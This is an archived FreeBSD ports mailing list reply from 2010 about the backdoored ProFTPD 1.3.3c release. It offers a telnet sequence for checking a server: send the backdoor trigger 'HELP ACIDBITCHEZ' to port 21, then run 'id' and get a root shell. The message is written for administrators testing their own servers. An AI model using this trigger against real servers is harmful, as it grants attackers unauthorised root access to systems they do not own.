Skip site navigation (1)Skip section navigation (2)
Date:      Thu, 2 Dec 2010 23:49:14 +0200
From:      Ivan Klymenko <fidaj@ukr.net>
To:        freebsd-ports@freebsd.org
Subject:   Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
Message-ID:  <20101202234914.26e53500@ukr.net>
In-Reply-To: <20101202232206.66c672a1@ukr.net>
References:  <20101202232206.66c672a1@ukr.net>

next in thread | previous in thread | raw e-mail | index | archive | help
=D0=92 Thu, 2 Dec 2010 23:22:06 +0200
Ivan Klymenko <fidaj@ukr.net> =D0=BF=D0=B8=D1=88=D0=B5=D1=82:

> Hello, people!
> What do you think is it worth to pay attention to these events:
> http://sourceforge.net/mailarchive/message.php?msg_name=3Dalpine.DEB.2.00=
.1012011542220.12930%40familiar.castaglia.org
>=20
> and that in this case needs to be done with the port ftp/proftpd
> itself?
>=20
> Thanks!

Check vulnerability of your server, you can by using the following
command sequence:

$ telnet 1.2.3.4 21
   Trying 1.2.3.4...
   Connected to 1.2.3.4
   Escape character is '^]'.
   220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4]
   =20
   HELP ACIDBITCHEZ
=20
   id ;
=20
   uid=3D0(root) gid=3D0(root) groups=3D0(root),65534(nogroup)



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20101202234914.26e53500>